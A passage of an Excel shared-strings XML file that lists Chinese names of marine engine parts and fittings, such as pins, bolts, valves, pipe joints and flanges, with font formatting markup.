    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高头圆柱停止销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低头圆柱停止销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔的圆柱销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定长锥型销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可变长度锥型销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.25d</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的金属螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有特殊螺纹公差的端头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1.25d</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的金属螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头自攻螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角沉头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角盖头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耐酸六角盖头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角圆柱头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带特殊螺纹公差的六角头螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢六角头螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴的六角头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开槽无头螺丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角圆柱端紧定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角凹端紧定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄螺帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通旋塞（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通阀总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹直通阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针型阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有测试法兰的针型阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹止回阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰型壳式蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水型蝶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带手柄的球阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直联轴节总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等径弯头接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等径三通接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通舱壁式接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹直通螺栓接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹直通螺栓接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头舱壁式接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调节弯头接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈的焊接接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等径十字交叉接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <t>Banjo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通外螺纹接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计用接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰接式（或可旋转式）接头总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切割环（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形翻边螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接内法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊颈法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（带船检证书）（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>40bar)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装材料，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有机硅粘贴密封材料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精密钢管（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <t>MK-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
  </si>
  <si>
    <r>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头（带船检证书）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拨叉，拨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫块固化工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CD-ROM-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CD-ROM-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装手册</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装手册</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封，轴向减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体板，油底壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镗孔工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻床导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁滤器样板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁滤器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>探测计划</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
